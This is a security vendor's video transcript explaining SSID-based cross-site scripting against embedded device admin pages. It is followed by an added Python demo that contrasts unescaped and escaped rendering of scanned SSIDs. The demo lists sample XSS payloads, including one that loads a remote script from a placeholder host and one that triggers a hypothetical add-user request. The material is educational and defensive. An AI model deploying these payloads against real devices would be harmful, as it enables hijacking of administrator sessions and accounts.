SSID XSS Vulnerabilities Explained

August 03, 2016

In today’s Whiteboard Wednesday, Deral Heiland, Research Lead at Rapid7, will discuss how SSID cross-site scripting (XSS) vulnerabilities work and how they are exploited.

Watch this week’s Whiteboard Wednesday to learn more.

Video Transcript

Welcome to Whiteboard Wednesday. My name is Deral Heiland, Research Lead at Rapid7.


This week's Whiteboard Wednesday Exploit Explained: SSID-based injections.

The first thing we want to do is talk about what an SSID is. An SSID, or service set identifier, is used to assign readable names to an 802.11 wireless network. That's so when you want to attach your device to a wireless network, you can easily identify the network you want to attach to.

An interesting trait about this, the SSID can contain up to 32 characters. For this injection attack to take place, the attacker must be able to keep his entire attack payload within 32 characters. Most of the attacks that I've seen carried out through SSIDs are often cross-site scripting type attacks or cross-site request forgery attacks. The reason for that is, most of the devices that we've encountered are embedded devices that have web servers. These web servers are used to configure various SSID functionality. This can include everything from access points to IoT technology where you integrate that device into the existing SSID networks.

When you log onto these devices, they usually have configuration pages, or administrative pages, that are used to identify all the local wireless devices that are within reasonable proximity of that particular device. The way the attack works, the attacker will actually fire up a wireless access point. It can be a soft AP. I usually use something off Linux. I run a program that'll actually fire up an SSID. I put my cross-site scripting code in there. What happens is the embedded server gets logged onto with a browser. The person logging onto the device is typically an administrative level person, so he has escalated rights. What happens is when he views that page, the cross-site scripting will trigger, giving you the ability to carry out various attacks against that device.

The type of attacks we've actually successfully done against various devices that have this particular issue, include everything from being able to create administrative accounts on the device, to having the device actually offload its configuration containing username and password information off to third party sites.

We've discovered this, like I said, in a number of different types of devices. This is everything from wireless access points, down to IoT technology, and including wireless LAN controller technology. So it's spread across a number of different appliances that you may encounter. Like I said, it's important to note, the appliance has to be able to interact with the wireless environment for this typical attack to actually work.

This does not mean all devices are vulnerable. Often, it's only going to be devices where the actual parsing on the web page hasn't properly filtered incoming data from the SSID data.

The way to fix this, unfortunately, is often only with a patch. Most occurrences of this type of attack have been reported to the vendors, and they've released patches for this particular vulnerability. If you constantly maintain a good patching program within your environment, you're often going to be protected from this style of attack.

That's it for this week's Whiteboard Wednesday. We'll talk to you next week.
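The following is an added example, not code from the video or from Rapid7, illustrating the two points the transcript makes: the payload has to fit in the 32-octet SSID limit, and the bug is the device's admin page writing scanned SSIDs into HTML without encoding them. The scan results, the table markup, the `/cgi-bin/adduser` path and the helper names are all constructed assumptions; the vulnerable and hardened rendering functions are shown side by side, with a small check that reports which tags survive into the rendered page.

```python
"""Scanned SSIDs rendered into an embedded admin page: unsafe vs. escaped.

Constructed example for illustration. The SSIDs, the page layout and the
/cgi-bin/adduser path are assumptions, not any vendor's firmware or UI.
"""
import html
import re

SSID_MAX_OCTETS = 32  # 802.11 caps an SSID at 32 octets, not 32 characters

# Constructed scan results as a web UI might receive them from the driver.
# The last three beacons are attacker-controlled and each fits in 32 octets.
SCAN_RESULTS = [
    "HomeNetwork",
    "Cafe Guest",
    "<img src=x onerror=alert(1)>",        # 28 octets: XSS proof of concept
    "<script src=//a.b/x></script>",       # 29 octets: pulls a remote script
    "<img src=/cgi-bin/adduser?u=x>",      # 30 octets: CSRF-style request fired
                                           # by the admin's browser (hypothetical path)
]

# Tags that belong to the page itself; anything else is injected content.
SCAFFOLD = re.compile(r"</?(table|tr|td)>")


def fits_in_ssid(payload: str) -> bool:
    """True if the payload fits the SSID limit once UTF-8 encoded."""
    return len(payload.encode("utf-8")) <= SSID_MAX_OCTETS


def render_unsafe(ssids):
    """Vulnerable pattern: SSIDs are trusted and concatenated straight into HTML."""
    rows = "".join(f"<tr><td>{s}</td></tr>" for s in ssids)
    return f"<table>{rows}</table>"


def render_escaped(ssids):
    """Hardened pattern: entity-encode every SSID before it reaches the page."""
    rows = "".join(f"<tr><td>{html.escape(s, quote=True)}</td></tr>" for s in ssids)
    return f"<table>{rows}</table>"


def injected_tags(page: str):
    """Return every tag in the page that is not part of the table scaffolding."""
    stripped = SCAFFOLD.sub("", page)
    return re.findall(r"<[^>]+>", stripped)


if __name__ == "__main__":
    for s in SCAN_RESULTS:
        print(f"{len(s.encode('utf-8')):2d} octets  fits={fits_in_ssid(s)}  {s!r}")
    print("unsafe page leaks:", injected_tags(render_unsafe(SCAN_RESULTS)))
    print("escaped page leaks:", injected_tags(render_escaped(SCAN_RESULTS)))
```

The length check encodes to UTF-8 before measuring because the limit is on octets; an SSID of 32 non-ASCII characters is rejected by the driver even though Python counts it as 32 characters. The escaped renderer is the fix the transcript refers to; the device still stores and displays the hostile SSID, it just can no longer execute in the administrator's browser.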
